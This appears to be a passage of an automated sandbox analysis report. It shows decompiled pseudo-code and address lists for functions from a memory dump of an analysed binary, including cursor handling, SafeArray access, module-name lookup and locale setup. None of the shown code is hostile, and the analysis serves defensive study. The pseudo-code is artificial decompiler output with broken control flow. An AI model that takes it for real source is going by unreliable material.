                                            0x0098fad0
                                            0x0098fad0
                                            0x00000000
                                            0x0098f80f
                                            0x0098f814
                                            0x0098f81a
                                            0x0098f820
                                            0x0098f828
                                            0x0098f835
                                            0x0098f83d
                                            0x0098f848
                                            0x0098f853
                                            0x0098f854
                                            0x0098f855
                                            0x0098f856
                                            0x0098f861
                                            0x0098f866
                                            0x0098f86b
                                            0x0098f873
                                            0x0098f876
                                            0x0098f878
                                            0x0098f888
                                            0x0098f88d
                                            0x0098f893
                                            0x0098f898
                                            0x0098f89a
                                            0x0098f89c
                                            0x0098f8a3
                                            0x0098f8b0
                                            0x0098f8b0
                                            0x0098f8a3
                                            0x0098f87a
                                            0x0098f881
                                            0x0098f881
                                            0x0098f8c7
                                            0x0098f8da
                                            0x0098f8e5
                                            0x0098f8ee
                                            0x0098f8fc
                                            0x0098f90d
                                            0x0098f91b
                                            0x0098f922
                                            0x0098f92a
                                            0x0098f92d
                                            0x0098f932
                                            0x0098f937
                                            0x0098f951
                                            0x0098f959
                                            0x0098f979
                                            0x0098f979
                                            0x0098f983
                                            0x0098f98d
                                            0x0098f991
                                            0x0098f991
                                            0x0098f991
                                            0x0098f993
                                            0x0098f995
                                            0x0098f99e
                                            0x00000000
                                            0x0098f9a4
                                            0x0098f9a4
                                            0x0098f9a8
                                            0x00000000
                                            0x00000000
                                            0x0098f9b2
                                            0x0098f9ca
                                            0x0098f9e5
                                            0x0098f9f7
                                            0x0098fa0f
                                            0x0098fa1b
                                            0x0098fa1e
                                            0x0098fa21
                                            0x0098fa21
                                            0x0098fa32
                                            0x0098fa37
                                            0x0098fa3f
                                            0x0098fa48
                                            0x0098fa59
                                            0x0098fa5e
                                            0x0098fa66
                                            0x0098fa6f
                                            0x0098fa7d
                                            0x0098fa96
                                            0x0098fa9c
                                            0x0098faa1
                                            0x0098faa6
                                            0x0098fabc
                                            0x0098faa8
                                            0x0098faae
                                            0x0098faae
                                            0x0098fade
                                            0x0098fae0
                                            0x0098fae3
                                            0x0098fae6
                                            0x0098faf6
                                            0x0098fafe
                                            0x0098fb09
                                            0x0098fb09
                                            0x0098f99e

                                            APIs
                                              • Part of subcall function 00985AB0: GetActiveWindow.USER32 ref: 00985AB3
                                              • Part of subcall function 00985AB0: GetCurrentThreadId.KERNEL32 ref: 00985AC8
                                              • Part of subcall function 00985AB0: EnumThreadWindows.USER32(00000000,00985A90), ref: 00985ACE
                                              • Part of subcall function 0098F524: GetCursor.USER32(?), ref: 0098F53F
                                              • Part of subcall function 0098F524: GetIconInfo.USER32(00000000,?), ref: 0098F545
                                            • ClientToScreen.USER32 ref: 0098F8B0
                                            • OffsetRect.USER32 ref: 0098F8C7
                                            • SetActiveWindow.USER32(?,?,?,?), ref: 0098F94A
                                            • OffsetRect.USER32 ref: 0098F9F7
                                              • Part of subcall function 0098F2F4: SetTimer.USER32 ref: 0098F30E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ActiveOffsetRectThreadWindow$ClientCurrentCursorEnumIconInfoScreenTimerWindows
                                            • String ID:
                                            • API String ID: 3275210486-0
                                            • Opcode ID: e8c3c7e5cc1440e562510275e621163e527ed7e04519e563dff7f7d35a2d14f2
                                            • Instruction ID: 19c6c0ecb5efb762ab7dec0579986a234c1ff14afac0e82041bcd1ed89af323a
                                            • Opcode Fuzzy Hash: e8c3c7e5cc1440e562510275e621163e527ed7e04519e563dff7f7d35a2d14f2
                                            • Instruction Fuzzy Hash: 04C1DF35A006188FCB14EFA8C894B9EB7F5BF49300F1581A5E509EB365EB30AD4ACF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096D564, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E0096D564(intOrPtr* __eax, signed int __edx) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr* _t60;
				intOrPtr* _t62;
				struct HICON__* _t65;
				intOrPtr _t67;
				intOrPtr* _t72;
				intOrPtr _t74;
				intOrPtr* _t75;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t85;
				struct HWND__* _t88;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr* _t93;
				intOrPtr _t97;
				intOrPtr _t100;
				intOrPtr _t102;
				intOrPtr _t103;
				intOrPtr _t104;
				intOrPtr _t106;
				struct HWND__* _t107;
				intOrPtr _t108;
				intOrPtr _t110;
				intOrPtr _t114;
				intOrPtr _t117;
				char _t118;
				intOrPtr _t119;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t140;
				intOrPtr* _t155;
				void* _t158;
				void* _t165;
				void* _t166;

				_t155 = __eax;
				if( *0x99cb54 != 0) {
					L3:
					_t49 =  *0x99cb34; // 0x0
					_t50 =  *0x99cb34; // 0x0
					_t117 = E0096D444(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
					if( *0x99cb54 == 0) {
						_t168 =  *0x99cb58;
						if( *0x99cb58 != 0) {
							_t106 =  *0x99cb48; // 0x0
							_t107 = GetDesktopWindow();
							_t108 =  *0x99cb58; // 0x0
							E00977504(_t108, _t107, _t168, _t106);
						}
					}
					_t53 =  *0x99cb34; // 0x0
					if( *((char*)(_t53 + 0x9b)) != 0) {
						__eflags =  *0x99cb54;
						_t6 =  &_v24;
						 *_t6 =  *0x99cb54 != 0;
						__eflags =  *_t6;
						 *0x99cb54 = 2;
					} else {
						 *0x99cb54 = 1;
						_v24 = 0;
					}
					_t54 =  *0x99cb38; // 0x0
					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
						L12:
						_t55 =  *0x99cb38; // 0x0
						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
						_t56 =  *0x99cb38; // 0x0
						if( *((intOrPtr*)(_t56 + 4)) != 0) {
							_t97 =  *0x99cb38; // 0x0
							E0096F198( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
							_t100 =  *0x99cb38; // 0x0
							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
						}
						_t131 = E0096D494(2);
						_t121 =  *_t155;
						_t60 =  *0x99cb38; // 0x0
						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
						if( *0x99cb58 != 0) {
							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
								_t82 =  *0x99cb58; // 0x0
								E009774EC(_t82, _t158);
								_t84 =  *0x99cb58; // 0x0
								_t177 =  *((char*)(_t84 + 0x6a));
								if( *((char*)(_t84 + 0x6a)) != 0) {
									_t121 =  *((intOrPtr*)(_t155 + 4));
									_t85 =  *0x99cb58; // 0x0
									E009775EC(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
								} else {
									_t88 = GetDesktopWindow();
									_t121 =  *_t155;
									_t89 =  *0x99cb58; // 0x0
									E00977504(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
								}
							} else {
								_t91 =  *0x99cb58; // 0x0
								E00977660(_t91, _t131, __eflags);
								_t93 =  *0x99b204; // 0x99cbbc
								SetCursor(E0098C9FC( *_t93, _t158));
							}
						}
						_t62 =  *0x99b204; // 0x99cbbc
						_t65 = SetCursor(E0098C9FC( *_t62, _t158));
						if( *0x99cb54 != 2) {
							L32:
							return _t65;
						} else {
							_t179 = _t117;
							if(_t117 != 0) {
								_t118 = E0096D4D0(_t121);
								_t67 =  *0x99cb38; // 0x0
								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
								__eflags = _t118;
								if(__eflags != 0) {
									E0096F198(_t118,  &_v24, _t155);
									_t65 = E00943328(_t118, __eflags);
									_t135 =  *0x99cb38; // 0x0
									 *(_t135 + 0x54) = _t65;
								} else {
									_t78 =  *0x99cb38; // 0x0
									_t65 = E00943328( *((intOrPtr*)(_t78 + 4)), __eflags);
									_t140 =  *0x99cb38; // 0x0
									 *(_t140 + 0x54) = _t65;
								}
							} else {
								_push( *((intOrPtr*)(_t155 + 4)));
								_t80 =  *0x99cb38; // 0x0
								_t65 = E00943328( *((intOrPtr*)(_t80 + 0x38)), _t179);
							}
							if( *0x99cb38 == 0) {
								goto L32;
							} else {
								_t119 =  *0x99cb38; // 0x0
								_t41 = _t119 + 0x5c; // 0x5c
								_t42 = _t119 + 0x44; // 0x44
								_t65 = E00947D80(_t42, 0x10, _t41);
								if(_t65 != 0) {
									goto L32;
								}
								if(_v28 != 0) {
									_t75 =  *0x99cb38; // 0x0
									 *((intOrPtr*)( *_t75 + 0x34))();
								}
								_t72 =  *0x99cb38; // 0x0
								 *((intOrPtr*)( *_t72 + 0x30))();
								_t74 =  *0x99cb38; // 0x0
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								return _t74;
							}
						}
					}
					_t65 = E0096D494(1);
					if( *0x99cb38 == 0) {
						goto L32;
					}
					_t102 =  *0x99cb38; // 0x0
					 *((intOrPtr*)(_t102 + 4)) = _t117;
					_t103 =  *0x99cb38; // 0x0
					 *((intOrPtr*)(_t103 + 8)) = _v28;
					_t104 =  *0x99cb38; // 0x0
					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
					_t65 = E0096D494(0);
					if( *0x99cb38 == 0) {
						goto L32;
					}
					goto L12;
				}
				_t110 =  *0x99cb44; // 0x0
				asm("cdq");
				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x99cb50; // 0x0
				if(_t165 >= 0) {
					goto L3;
				}
				_t114 =  *0x99cb48; // 0x0
				asm("cdq");
				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
				_t166 = _t65 -  *0x99cb50; // 0x0
				if(_t166 < 0) {
					goto L32;
				}
				goto L3;
			}

















































                                            0x0096d56a
                                            0x0096d573
                                            0x0096d5a2
                                            0x0096d5a2
                                            0x0096d5a8
                                            0x0096d5be
                                            0x0096d5c7
                                            0x0096d5c9
                                            0x0096d5d0
                                            0x0096d5d2
                                            0x0096d5d8
                                            0x0096d5e5
                                            0x0096d5ea
                                            0x0096d5ea
                                            0x0096d5d0
                                            0x0096d5ef
                                            0x0096d5fb
                                            0x0096d60b
                                            0x0096d612
                                            0x0096d612
                                            0x0096d612
                                            0x0096d617
                                            0x0096d5fd
                                            0x0096d5fd
                                            0x0096d604
                                            0x0096d604
                                            0x0096d61e
                                            0x0096d626
                                            0x0096d673
                                            0x0096d673
                                            0x0096d67a
                                            0x0096d680
                                            0x0096d683
                                            0x0096d68c
                                            0x0096d694
                                            0x0096d69c
                                            0x0096d6a1
                                            0x0096d6aa
                                            0x0096d6b1
                                            0x0096d6b1
                                            0x0096d6bf
                                            0x0096d6c1
                                            0x0096d6c3
                                            0x0096d6cd
                                            0x0096d6d6
                                            0x0096d6da
                                            0x0096d6e4
                                            0x0096d6e9
                                            0x0096d6ee
                                            0x0096d6f3
                                            0x0096d6f7
                                            0x0096d712
                                            0x0096d717
                                            0x0096d71c
                                            0x0096d6f9
                                            0x0096d6fd
                                            0x0096d704
                                            0x0096d706
                                            0x0096d70b
                                            0x0096d70b
                                            0x0096d723
                                            0x0096d723
                                            0x0096d728
                                            0x0096d730
                                            0x0096d73d
                                            0x0096d73d
                                            0x0096d6da
                                            0x0096d745
                                            0x0096d752
                                            0x0096d75e
                                            0x0096d831
                                            0x0096d831
                                            0x0096d764
                                            0x0096d764
                                            0x0096d766
                                            0x0096d787
                                            0x0096d789
                                            0x0096d78e
                                            0x0096d791
                                            0x0096d793
                                            0x0096d7c1
                                            0x0096d7d0
                                            0x0096d7d5
                                            0x0096d7db
                                            0x0096d795
                                            0x0096d79d
                                            0x0096d7a9
                                            0x0096d7ae
                                            0x0096d7b4
                                            0x0096d7b4
                                            0x0096d768
                                            0x0096d76b
                                            0x0096d76e
                                            0x0096d77b
                                            0x0096d77b
                                            0x0096d7e5
                                            0x00000000
                                            0x0096d7e7
                                            0x0096d7e7
                                            0x0096d7ed
                                            0x0096d7f0
                                            0x0096d7f8
                                            0x0096d7ff
                                            0x00000000
                                            0x00000000
                                            0x0096d806
                                            0x0096d808
                                            0x0096d80f
                                            0x0096d80f
                                            0x0096d812
                                            0x0096d819
                                            0x0096d81c
                                            0x0096d827
                                            0x0096d828
                                            0x0096d829
                                            0x0096d82a
                                            0x00000000
                                            0x0096d82a
                                            0x0096d7e5
                                            0x0096d75e
                                            0x0096d62a
                                            0x0096d636
                                            0x00000000
                                            0x00000000
                                            0x0096d63c
                                            0x0096d641
                                            0x0096d644
                                            0x0096d64c
                                            0x0096d64f
                                            0x0096d656
                                            0x0096d65c
                                            0x0096d661
                                            0x0096d66d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0096d66d
                                            0x0096d575
                                            0x0096d57c
                                            0x0096d581
                                            0x0096d587
                                            0x00000000
                                            0x00000000
                                            0x0096d589
                                            0x0096d591
                                            0x0096d594
                                            0x0096d596
                                            0x0096d59c
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetDesktopWindow.USER32 ref: 0096D5D8
                                            • GetDesktopWindow.USER32 ref: 0096D6FD
                                            • SetCursor.USER32(00000000), ref: 0096D752
                                              • Part of subcall function 00977660: 73641770.COMCTL32(00000000,?,0096D72D), ref: 0097767C
                                              • Part of subcall function 00977660: ShowCursor.USER32(000000FF,00000000,?,0096D72D), ref: 00977697
                                            • SetCursor.USER32(00000000), ref: 0096D73D
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Cursor$DesktopWindow$73641770Show
                                            • String ID:
                                            • API String ID: 3269581247-0
                                            • Opcode ID: d88128ce9936e0072a81279212ad44be4ce70d9618cc1e0f7addabc2d9d176b9
                                            • Instruction ID: 608128890dbe61e9b36f66f77acccf5625ea2d17bb574c0362c47fa474bc5958
                                            • Opcode Fuzzy Hash: d88128ce9936e0072a81279212ad44be4ce70d9618cc1e0f7addabc2d9d176b9
                                            • Instruction Fuzzy Hash: D69149F4A1A2818FC700EF2CDD86A15BBE5BB89310F148457E4548B366C735EC85EBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094E8D8, Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E0094E8D8(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0094E720(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0094D930();
							E0094E720(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0094D938();
							E0094E720(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0094E87C(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0094E84C(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0094D940();
						E0094E720(_v780);
						E0094EAD0(_v792);
					}
				}
				L15:
				_push(_v776);
				L0094D4CC();
				return E0094E720(_v776);
			}






















                                            0x0094e8e4
                                            0x0094e8f4
                                            0x0094e8fb
                                            0x0094e8fb
                                            0x0094e906
                                            0x0094e914
                                            0x0094e923
                                            0x0094e941
                                            0x0094e925
                                            0x0094e930
                                            0x0094e930
                                            0x0094e950
                                            0x0094e95c
                                            0x0094e95f
                                            0x0094e961
                                            0x0094e962
                                            0x0094e964
                                            0x0094e96a
                                            0x0094e96c
                                            0x0094e97b
                                            0x0094e97c
                                            0x0094e986
                                            0x0094e987
                                            0x0094e98c
                                            0x0094e997
                                            0x0094e998
                                            0x0094e9a2
                                            0x0094e9a3
                                            0x0094e9a8
                                            0x0094e9c3
                                            0x0094e9c5
                                            0x0094e9c6
                                            0x0094e9c9
                                            0x0094e9c9
                                            0x0094e96a
                                            0x0094e9d2
                                            0x0094e9d5
                                            0x0094e9d7
                                            0x0094e9d8
                                            0x0094e9de
                                            0x0094e9e4
                                            0x0094e9e6
                                            0x0094e9e8
                                            0x0094e9eb
                                            0x0094e9ee
                                            0x0094e9ee
                                            0x0094e9f1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0094e9f1
                                            0x0094e9f1
                                            0x0094e9f8
                                            0x0094ea03
                                            0x0094ea0b
                                            0x0094ea12
                                            0x0094ea19
                                            0x0094ea1a
                                            0x0094ea1f
                                            0x0094ea2a
                                            0x0094ea2a
                                            0x0094ea38
                                            0x0094ea3c
                                            0x0094ea42
                                            0x0094ea43
                                            0x0094ea53

                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0094E987
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0094E9A3
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0094EA1A
                                            • VariantClear.OLEAUT32(?), ref: 0094EA43
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                            • String ID:
                                            • API String ID: 920484758-0
                                            • Opcode ID: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                                            • Instruction ID: 54f773c2f2af2a1faac66c2f7bbed7ab418842090b6e5522f5bf7f9dabce4205
                                            • Opcode Fuzzy Hash: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                                            • Instruction Fuzzy Hash: F141F979A016299FCB62DB58CC91FD9B3BDBF48714F0046D5E649E7252DA30AF808F60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094B2F4, Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094B2F4(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x99c668; // 0x940000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0094B2E8(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0094862C( &_v273, 0x104, E0094C2C8(0x5c) + 1);
				_t74 = 0x94b474;
				_t86 = 0x94b474;
				_t83 =  *0x9470dc; // 0x947128
				if(E009432B8(_t87, _t83) != 0) {
					_t74 = E00944470( *((intOrPtr*)(_t87 + 4)));
					_t69 = E009485C8(_t74, 0x94b474);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x94b478;
					}
				}
				_t51 =  *0x99b1f4; // 0x946e8c
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x99c668; // 0x940000
				LoadStringA(E009452C0(_t53),  *_t16,  &_v790, 0x100);
				E0094307C( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00948C50(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E009485C8(_v8, _t86);
			}































                                            0x0094b2f4
                                            0x0094b300
                                            0x0094b303
                                            0x0094b305
                                            0x0094b311
                                            0x0094b320
                                            0x0094b34a
                                            0x0094b350
                                            0x0094b35c
                                            0x0094b361
                                            0x0094b367
                                            0x0094b367
                                            0x0094b385
                                            0x0094b38a
                                            0x0094b38f
                                            0x0094b396
                                            0x0094b3a3
                                            0x0094b3ad
                                            0x0094b3b1
                                            0x0094b3b8
                                            0x0094b3c1
                                            0x0094b3c1
                                            0x0094b3b8
                                            0x0094b3d2
                                            0x0094b3d7
                                            0x0094b3db
                                            0x0094b3e6
                                            0x0094b3f3
                                            0x0094b3fe
                                            0x0094b404
                                            0x0094b411
                                            0x0094b417
                                            0x0094b421
                                            0x0094b427
                                            0x0094b42e
                                            0x0094b434
                                            0x0094b43b
                                            0x0094b441
                                            0x0094b45d
                                            0x0094b470

                                            APIs
                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0094B311
                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0094B335
                                            • GetModuleFileNameA.KERNEL32(00940000,?,00000105), ref: 0094B350
                                            • LoadStringA.USER32 ref: 0094B3E6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                            • String ID:
                                            • API String ID: 3990497365-0
                                            • Opcode ID: 1d33a77db60ddecb3a538580d512d6bbe24589c94a25a837674033bcdddee6b8
                                            • Instruction ID: b04eac171aff615f0ebc4dbf8cb01af93f5434b14e866f6473fc35f10b57e76f
                                            • Opcode Fuzzy Hash: 1d33a77db60ddecb3a538580d512d6bbe24589c94a25a837674033bcdddee6b8
                                            • Instruction Fuzzy Hash: 164109B1A002589BDB21EBA9DD85FDEB7FCAB58300F0040E6A548E7252D7749F84CF51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0094C41C, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0094C41C() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x99c744 = 0x409;
				 *0x99c748 = 9;
				 *0x99c74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x99c744 = _t14;
				}
				if(_t14 != 0) {
					 *0x99c748 = _t14 & 0x3ff;
					 *0x99c74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x99a11c, 0x94c570, 8 << 2);
				if( *0x99a0d4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x99c751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x99c750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0094C3A4(__eflags, _t49);
					}
				} else {
					_t20 = E0094C404();
					if(_t20 != 0) {
						 *0x99c751 = 0;
						 *0x99c750 = 0;
						return _t20;
					}
					E0094C3A4(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00942C64(0x99a11c, 0x20, 0x94c570);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x99c750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x99c751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x99c744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x99c751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















                                            0x0094c428
                                            0x0094c432
                                            0x0094c43c
                                            0x0094c446
                                            0x0094c44d
                                            0x0094c44f
                                            0x0094c44f
                                            0x0094c457
                                            0x0094c463
                                            0x0094c46f
                                            0x0094c46f
                                            0x0094c483
                                            0x0094c48c
                                            0x0094c53b
                                            0x0094c540
                                            0x0094c545
                                            0x0094c54c
                                            0x0094c551
                                            0x0094c553
                                            0x0094c556
                                            0x0094c55c
                                            0x0094c55e
                                            0x00000000
                                            0x0094c566
                                            0x0094c492
                                            0x0094c492
                                            0x0094c499
                                            0x0094c49b
                                            0x0094c4a2
                                            0x00000000
                                            0x0094c4a2
                                            0x0094c4af
                                            0x0094c4bf
                                            0x0094c4c1
                                            0x0094c4c6
                                            0x0094c4c9
                                            0x0094c4cf
                                            0x0094c4d1
                                            0x0094c4d3
                                            0x00000000
                                            0x0094c4d3
                                            0x0094c4df
                                            0x0094c4e4
                                            0x0094c4ea
                                            0x0094c4ea
                                            0x0094c4ec
                                            0x0094c4ed
                                            0x0094c4ee
                                            0x0094c4ee
                                            0x0094c50a
                                            0x0094c510
                                            0x0094c515
                                            0x0094c51a
                                            0x0094c520
                                            0x0094c520
                                            0x0094c524
                                            0x0094c527
                                            0x0094c52d
                                            0x0094c52f
                                            0x00000000
                                            0x00000000
                                            0x0094c531
                                            0x0094c534
                                            0x0094c534
                                            0x0094c535
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0094c535
                                            0x0094c520
                                            0x0094c56d
                                            0x0094c56d
                                            0x00000000

                                            APIs
                                            • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0094C510
                                            • GetThreadLocale.KERNEL32 ref: 0094C446
                                              • Part of subcall function 0094C3A4: GetCPInfo.KERNEL32(00000000,?), ref: 0094C3BD
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: InfoLocaleStringThreadType
                                            • String ID:
                                            • API String ID: 1505017576-0
                                            • Opcode ID: 288377c376e87868179458a7bd4f33ed8b56888c0567d43e533f4a2ac605fd36
